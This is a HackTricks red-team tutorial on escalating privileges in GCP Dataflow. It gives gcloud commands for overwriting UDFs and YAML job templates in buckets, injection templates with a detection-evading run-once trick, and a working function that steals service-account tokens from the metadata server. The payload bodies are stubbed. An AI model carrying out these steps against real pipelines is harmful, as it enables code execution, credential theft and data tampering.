GCP - Dataflow Privilege Escalation
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Dataflow
storage.objects.create, storage.objects.get, storage.objects.update
Dataflow does not validate the integrity of UDFs or job template YAML files stored in GCS. With write access to the bucket, you can overwrite these files to inject code that executes on the workers, steal service account tokens, or tamper with the processed data. Both batch and streaming pipeline jobs are viable targets. To exploit a pipeline, you must replace the UDF/template before the job reads it: either during the first few minutes after submission (before the workers are created) or, for a running job, before autoscaling spins up new workers.
Attack vectors:
- UDF hijacking: Python (.py) and JS (.js) UDFs referenced by pipelines and stored in customer-managed buckets
- Job template hijacking: custom YAML pipeline definitions stored in customer-managed buckets
Warning
Run-once-per-worker trick: Dataflow UDFs and template callables are invoked per row/line. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a file-based coordination pattern: at the start, check whether a marker file (e.g. /tmp/pwnd.txt) exists; if it does, skip the malicious code; if not, run the payload and create the file. This ensures the payload runs once per worker rather than once per line.
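The coordination pattern above can be sketched as a small helper. This is a minimal, self-contained illustration; the marker path and the `run_once` name are placeholders, not Dataflow APIs:

```python
import os
import tempfile

# Minimal sketch of the file-based run-once coordination pattern.
# The marker path is illustrative; on a worker you would use /tmp/pwnd.txt.
MARKER = os.path.join(tempfile.gettempdir(), "pwnd.txt")

def run_once(payload):
    """Run `payload` only the first time this is called on a worker."""
    if os.path.exists(MARKER):
        return False              # marker exists: payload already ran, skip
    payload()                     # malicious code would go here
    with open(MARKER, "w", encoding="utf-8") as f:
        f.write("done")           # create marker so later rows skip the payload
    return True
```

Calling `run_once` from the per-row entry point means the payload fires exactly once per worker, no matter how many rows the worker processes.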
Direct exploitation via gcloud CLI
- Enumerate Dataflow jobs and locate the template/UDF GCS paths:
List jobs and describe to get template path, staging location, and UDF references
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>
# Describe a job to get template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
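To script this triage step, the interesting GCS paths can be lifted from the parsed JSON of `gcloud dataflow jobs describe ... --format=json`. A hedged sketch: the option names match those listed above, and `environment.sdkPipelineOptions.options` is where classic jobs typically expose them (verify against your job's actual output):

```python
# Hypothetical helper: extract hijackable GCS paths from a parsed
# `gcloud dataflow jobs describe ... --format=json` output (a dict).
INTERESTING_OPTIONS = (
    "tempLocation", "stagingLocation", "templateLocation", "flexTemplateGcsPath",
)

def extract_gcs_targets(job):
    """Return {option_name: gs:// path} for interesting options in the job."""
    opts = (
        job.get("environment", {})
           .get("sdkPipelineOptions", {})
           .get("options", {})
    )
    return {k: v for k, v in opts.items()
            if k in INTERESTING_OPTIONS and str(v).startswith("gs://")}
```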
- Download the original UDF or job template from GCS:
Download UDF file or YAML template from bucket
# If job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
- Edit the file locally: inject the malicious payload (see the Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.
- Re-upload to overwrite the original file:
Overwrite UDF or template in bucket
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
- Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.
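The edit-locally step can be automated with plain string splicing: prepend the payload to the downloaded UDF source so the original logic stays intact. A sketch with illustrative names; the payload body mirrors the run-once pattern used throughout this page:

```python
# Illustrative helper: splice a payload into a downloaded UDF source
# string while keeping the original transform logic valid.
PAYLOAD = '''\
import os

def _malicious_func():
    coordination_file = "/tmp/pwnd.txt"
    if os.path.exists(coordination_file):
        return
    # malicious code goes here
    with open(coordination_file, "w", encoding="utf-8") as f:
        f.write("done")
'''

def inject_payload(original_source):
    """Prepend the payload; the UDF entry point should then call _malicious_func()."""
    return PAYLOAD + "\n" + original_source
```

Write the result to `udf_injected.py` and overwrite the bucket copy as shown above.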
Python UDF injection
If you want the worker to exfiltrate data to your C2 server, use urllib.request rather than requests: requests is not preinstalled on classic Dataflow workers.
Malicious UDF with run-once coordination and metadata extraction
import os
import json
import urllib.request
from datetime import datetime

def _malicious_func():
    # File-based coordination: run once per worker.
    coordination_file = "/tmp/pwnd.txt"
    if os.path.exists(coordination_file):
        return
    # malicious code goes here
    with open(coordination_file, "w", encoding="utf-8") as f:
        f.write("done")

def transform(line):
    # Malicious code entry point - runs per line, but coordination ensures once per worker
    try:
        _malicious_func()
    except Exception:
        pass
    # ... original UDF logic follows ...
Job template YAML injection
Inject a MapToFields step with a callable that uses a coordination file. For YAML-based pipelines, use requests only if the template declares dependencies: [requests]; otherwise prefer urllib.request.
Add a cleanup step (drop: [malicious_step]) so the pipeline still writes valid data to the destination.
Malicious MapToFields step and cleanup in pipeline YAML
- name: MaliciousTransform
  type: MapToFields
  input: Transform
  config:
    language: python
    fields:
      malicious_step:
        callable: |
          def extract_and_return(row):
              import os
              import json
              from datetime import datetime
              coordination_file = "/tmp/pwnd.txt"
              if os.path.exists(coordination_file):
                  return True
              try:
                  import urllib.request
                  # malicious code goes here
                  with open(coordination_file, "w", encoding="utf-8") as f:
                      f.write("done")
              except Exception:
                  pass
              return True
    append: true

- name: CleanupTransform
  type: MapToFields
  input: MaliciousTransform
  config:
    fields: {}
    append: true
    drop:
      - malicious_step
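Why the cleanup step matters can be shown with a pure-Python simulation (not Beam itself) of the MapToFields append/drop semantics: the malicious step appends a bogus field, and the cleanup step drops it, so the row that reaches the sink matches the original schema:

```python
# Pure-Python simulation (not Beam) of MapToFields append/drop semantics,
# showing why the cleanup step restores the original row schema.
def map_to_fields(row, new_fields=None, append=True, drop=()):
    out = dict(row) if append else {}
    for name, fn in (new_fields or {}).items():
        out[name] = fn(row)          # e.g. the malicious callable
    for name in drop:
        out.pop(name, None)          # cleanup: drop the injected field
    return out
```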
Compute Engine access to Dataflow Workers
Permissions: compute.instances.osLogin or compute.instances.osAdminLogin (with iam.serviceAccounts.actAs over the worker SA), or compute.instances.setMetadata / compute.projects.setCommonInstanceMetadata (with iam.serviceAccounts.actAs) for legacy SSH key injection
Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token), manipulate data, or run arbitrary code.
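As a sketch, a token request against the metadata endpoint above must carry the `Metadata-Flavor: Google` header or the server refuses it; the call only succeeds from inside a GCP VM, and the function names here are illustrative:

```python
import json
import urllib.request

# Token request against the GCE metadata server described above.
# The Metadata-Flavor header is mandatory.
TOKEN_URL = ("http://169.254.169.254/computeMetadata/v1/"
             "instance/service-accounts/default/token")

def build_token_request():
    return urllib.request.Request(TOKEN_URL,
                                  headers={"Metadata-Flavor": "Google"})

def steal_token():
    # Only works from inside a GCP VM / Dataflow worker.
    with urllib.request.urlopen(build_token_request(), timeout=5) as resp:
        return json.loads(resp.read())["access_token"]
```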
For exploitation details, see:
- GCP - Compute Privesc — compute.instances.osLogin, compute.instances.osAdminLogin, compute.instances.setMetadata
References
- Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow
- Control access with IAM (Dataflow)
- gcloud dataflow jobs describe
- Apache Beam YAML: User-defined functions
- Apache Beam YAML Transform Reference